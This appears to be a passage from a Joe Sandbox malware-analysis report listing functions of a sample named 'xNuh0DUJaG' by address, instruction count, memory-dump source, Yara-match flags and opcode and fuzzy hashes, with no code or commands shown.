                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 72020315f9591e10a925340aaa42bd314528023c988bae550c98a300e050c010
                                                                                                                                                                                                                                        • Instruction ID: 381d8ba9b41755d1dc6d15d311edfbcab53db212d726a0c48d74eb4341d637bc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72020315f9591e10a925340aaa42bd314528023c988bae550c98a300e050c010
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63C146B5908300AFD7109F24DC81B9BBBE2BFD5354F148A2EF4E8932A1D77998458B46
                                                                                                                                                                                                                                        Function 02132D8B Relevance: .4, Instructions: 382COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a42bc307b6df4b8a2997052392abae3ba1b04b865f6d04cebd1ac29fa035a6ac
                                                                                                                                                                                                                                        • Instruction ID: 87180a25e18e735e40b3df25af3679e13b62362ec2b2f1014ef9b163081f41b4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a42bc307b6df4b8a2997052392abae3ba1b04b865f6d04cebd1ac29fa035a6ac
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0F10871604B808FD315CB38C8917A6BFE3AF96314F1D8AACC5EA8B392D735A805C751
                                                                                                                                                                                                                                        Function 00432B24 Relevance: .4, Instructions: 382COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8c0a9166a04c5760c1588164b88e9ffc0143b82c709cbe52f4ad1b494d4a97c7
                                                                                                                                                                                                                                        • Instruction ID: 1ceb5ad02d8bbd155c1732c87becb70ba2bb68f476a2c3c7809d4ed59241557d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c0a9166a04c5760c1588164b88e9ffc0143b82c709cbe52f4ad1b494d4a97c7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CF13B72605B808FD315CB3CC8513A6BFE2AF9A314F1C866DD1EB8B392D679A805C715
                                                                                                                                                                                                                                        Function 0213572B Relevance: .4, Instructions: 379COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 64d23a176a35810a23fac51187625fdecd54078f476d88896bd3dcd6ea4a90e6
                                                                                                                                                                                                                                        • Instruction ID: 3e8c0dceb04a85f2ba29dd22013dd6028e1a1b2bb118ff935ec824aa8b19fabb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 64d23a176a35810a23fac51187625fdecd54078f476d88896bd3dcd6ea4a90e6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7F19B62625AC18FE3158B3DC811392FFE2AB56304F0CCAADD0D9CB787C26DE5418755
                                                                                                                                                                                                                                        Function 004354C4 Relevance: .4, Instructions: 379COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9313d19cdd044b57c5ead0796368d96046328bd9f89c17f02012ef33b6c5538c
                                                                                                                                                                                                                                        • Instruction ID: 3f1c9d1a024df14266348ce370e510d7f88b70138a1f1607deade05ec74f5600
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9313d19cdd044b57c5ead0796368d96046328bd9f89c17f02012ef33b6c5538c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3DF19B62625AC18FE3158B3DC811396FFE2AB66304F1CCAAED0D9CB787C12DE5418B55
                                                                                                                                                                                                                                        Function 02114E87 Relevance: .4, Instructions: 352COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 784a6082fd36e0f2db424425c66ea396cbe7c3108031eaa283b40557bcb29b39
                                                                                                                                                                                                                                        • Instruction ID: cc6ed536f638d1f34f0c151842f8a9dab43a0d4322ed7549d22e326ab4efb558
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 784a6082fd36e0f2db424425c66ea396cbe7c3108031eaa283b40557bcb29b39
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B08154B2A5831187C728DF28CC9276B73E2EFC1314F19852CE8868B795F7789905C792
                                                                                                                                                                                                                                        Function 02112442 Relevance: .3, Instructions: 328COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d0704939d3ffdea9ec5931a0f43224e15fa154c614923ed6ac8c930f834d7e03
                                                                                                                                                                                                                                        • Instruction ID: d502c9062091ddecbc33de4484a97b4a808154af931e69bca70465ed039c0821
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0704939d3ffdea9ec5931a0f43224e15fa154c614923ed6ac8c930f834d7e03
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5C1D6B1A44B408FD7249F38C8D13A6BBE2AF55314F19893DC8EA877C1E776A405CB52
                                                                                                                                                                                                                                        Function 004121DB Relevance: .3, Instructions: 328COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5a9f635dd852b41b7c60ed20ba741a58096cfaa4ee9890b2400d9fe663f5cf59
                                                                                                                                                                                                                                        • Instruction ID: d9e51bed8acac8e2edf38fb82beeca54912ebc64a1188df36e5052ebbd943c0e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a9f635dd852b41b7c60ed20ba741a58096cfaa4ee9890b2400d9fe663f5cf59
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3C117B5604B408FC7109F38D5D13A6BBE1AF55314F18893ED4EBCB382E679A456CB06
                                                                                                                                                                                                                                        Function 0211D327 Relevance: .3, Instructions: 307COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 56f92c23f4de9e7d5ead2b134e5edb7bf87a3dc66531e3755251521cd286cddd
                                                                                                                                                                                                                                        • Instruction ID: f79a475f6d3fcf1888ea1a7d3e69c9499b68268fbc15eeb98f5cad8295044989
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56f92c23f4de9e7d5ead2b134e5edb7bf87a3dc66531e3755251521cd286cddd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF9139726482614FC716CE28989075FBBE2AB85228F19867DECF99B3D1C734D805C7D1
                                                                                                                                                                                                                                        Function 0041D0C0 Relevance: .3, Instructions: 307COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 261da269869b40bfe185e36c4caea727d5cf95f090471bfb73278ec76fa3dc74
                                                                                                                                                                                                                                        • Instruction ID: caf67132f2853a10be2cec12a01a7e8acbb33fc6e304049243772e7507394de4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 261da269869b40bfe185e36c4caea727d5cf95f090471bfb73278ec76fa3dc74
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36913B72A082614BC715CE28C89169FBBE1AB85324F19867DECF95B3D2C238DC45D7D2
                                                                                                                                                                                                                                        Function 02106627 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 32a6d0b72cf3d2ffc0339e9a321dcc048d2014ea7503e5de902cc41c51ca1703
                                                                                                                                                                                                                                        • Instruction ID: 8345a488f44664c91b153ad316dd9646b4ff10d7446a9b1cc181b8b8f7657c7e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32a6d0b72cf3d2ffc0339e9a321dcc048d2014ea7503e5de902cc41c51ca1703
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62C15CB2948781CFC364CF68CC96BABB7E5BF85318F08492DD1D9C6242E778A155CB06
                                                                                                                                                                                                                                        Function 004063C0 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 32a6d0b72cf3d2ffc0339e9a321dcc048d2014ea7503e5de902cc41c51ca1703
                                                                                                                                                                                                                                        • Instruction ID: b5a54add573a1b485231af3f9cb3d4e6e0a3023674c66bc51678a471f8a90890
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32a6d0b72cf3d2ffc0339e9a321dcc048d2014ea7503e5de902cc41c51ca1703
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35C15BB29087418FC360CF28DC96BABB7E1BF85318F09492DD1DAD6342E778A155CB46
                                                                                                                                                                                                                                        Function 00428B67 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 445fa7bb5657631e2454b87089e2e6838ddfea7a1e3368e0ef13d83bf20e4199
                                                                                                                                                                                                                                        • Instruction ID: bb3a0c3427b6ad34a24ef151da1f5bba878f0071efde783ca6760e8be5e6876f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 445fa7bb5657631e2454b87089e2e6838ddfea7a1e3368e0ef13d83bf20e4199
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BFA122356087A1CFD7248F38A85136E77A2FF8A320F09866DE5A5873D1DB34AD10CB85
                                                                                                                                                                                                                                        Function 021085C7 Relevance: .3, Instructions: 293COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: efceb4474c8754919e34955767b11e01cdcec574c0cdc4abedb62241ada74e8b
                                                                                                                                                                                                                                        • Instruction ID: 6749e9155b681128c922fd8a7a8b8d0c1d7962bd1aaa927052c4307e52388f2d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efceb4474c8754919e34955767b11e01cdcec574c0cdc4abedb62241ada74e8b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF915B71A4C3564BC3159E28C8C435BBBE2ABC1314F1BCA69D8E1873E9E7B4D8458BC5
                                                                                                                                                                                                                                        Function 00408360 Relevance: .3, Instructions: 293COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: efceb4474c8754919e34955767b11e01cdcec574c0cdc4abedb62241ada74e8b
                                                                                                                                                                                                                                        • Instruction ID: e04948112db42d3daa275aef66cee61d38744a578a2e7a742b1881ec96335045
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efceb4474c8754919e34955767b11e01cdcec574c0cdc4abedb62241ada74e8b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A915B31A083564BC3119E24CA8425BBBD2ABC1310F19CA3ED8D1A73E9EE7DDC458BC5
                                                                                                                                                                                                                                        Function 00427070 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5194799259fd5a137c82c89d43496dce8058f14fa6ca7be25fd15c1bfac91166
                                                                                                                                                                                                                                        • Instruction ID: 4e43b3032b5f77b82ebf5265758dd730748cf5b28328c74b298a748a547da810
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5194799259fd5a137c82c89d43496dce8058f14fa6ca7be25fd15c1bfac91166
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2915635E04225DFDB15CFA8D8907AEB7B2FF4A300F9980A9D502AB351D739AD42CB44
                                                                                                                                                                                                                                        Function 02142CC7 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e9967d51fbd7d66a82ac835e53c8b6f5d839448025aa1fb83a89f7dd4b290d4c
                                                                                                                                                                                                                                        • Instruction ID: 20dc589a2b6d796f7f7c413a2a03b1a44f629c80d260a38314a68c2ec4e712d9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9967d51fbd7d66a82ac835e53c8b6f5d839448025aa1fb83a89f7dd4b290d4c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B81A1352443559FC724DF28C890A6AB3E1EF89324F55866CFD998B3A1EB31E891CB41
                                                                                                                                                                                                                                        Function 00442A60 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9c90c13bf0ad2025be2ee518816828ce6c161b5f342d5640831e38625303febd
                                                                                                                                                                                                                                        • Instruction ID: 6a93b08fa6992d126e12a7bd6c306b93c6ef3d764d3eda4b37502e868ad0b706
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c90c13bf0ad2025be2ee518816828ce6c161b5f342d5640831e38625303febd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A581F0342043169FD724DF28C980A6BB3E1EF89324F58862DF9958B3A1E774EC11CB49
                                                                                                                                                                                                                                        Function 0213FA87 Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 2d568270202be8666c6747a97cae15c503a0743d92dee52a571f55b25c44adc8
                                                                                                                                                                                                                                        • Instruction ID: d388697d09ec93e7786372c16c3a303e937b1c9cc04bbea25266122be1248b72
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d568270202be8666c6747a97cae15c503a0743d92dee52a571f55b25c44adc8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7081E97164C3918FC31ACF28C4A066EBBE3AFC5214F19866DE4E58B791D731D806CB52
                                                                                                                                                                                                                                        Function 0043F820 Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 65fb0a9cf5c7a5beba6f5b7964eaa3617ac053cdeb6c41b82f3fd792d2c361b3
                                                                                                                                                                                                                                        • Instruction ID: fae485aafa8165bbfa862cfdd16e6316f883ffda102aca194f523248728328e0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65fb0a9cf5c7a5beba6f5b7964eaa3617ac053cdeb6c41b82f3fd792d2c361b3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D381B47160C3828FC319DE28C49062BBBE2AFC9314F198A7EE4D58B391D735D84AC756
                                                                                                                                                                                                                                        Function 02142A17 Relevance: .2, Instructions: 247COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8ede958760def0fb47ef62c8d664d44c55fbe6b810f6c68a305d53f1873dda57
                                                                                                                                                                                                                                        • Instruction ID: 43c4c0507ccf47eb4cc6b7270faff026d47f720e520c445b4d2c88637c749072
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ede958760def0fb47ef62c8d664d44c55fbe6b810f6c68a305d53f1873dda57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C581C0342452059BD728DF2CC890A2AB7F2EF89314F15856CFD998B3A0EF31E991CB45
                                                                                                                                                                                                                                        Function 00429ADE Relevance: .2, Instructions: 243COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: ff27bef942aa076814158b0aae043ce6e7546daa84f1ffa5fe42400bbafb5509
                                                                                                                                                                                                                                        • Instruction ID: c17fc45f9444ad44d9f96848d075c221a78d48c9dc0fb9f00e6e29a18ae657e2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff27bef942aa076814158b0aae043ce6e7546daa84f1ffa5fe42400bbafb5509
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C97167B2A087248FD7088F29D85133BB6D2ABC5314F49467DE8969F392DB349C01CB86
                                                                                                                                                                                                                                        Function 0212DE57 Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5e074d498d349d20c17923ebbca61cde330de8c03f771f91164867053bffb89f
                                                                                                                                                                                                                                        • Instruction ID: bc2e14b907299c9e7ef312c2917f2e189d590fb186b23bf57000f4bb18c56213
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e074d498d349d20c17923ebbca61cde330de8c03f771f91164867053bffb89f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9571ABB414D3E18BE73A8F25959879BBFE1AF93308F184A5CE0D90B292C735440ACB57
                                                                                                                                                                                                                                        Function 0042DBF0 Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                                        Download Yara Rule
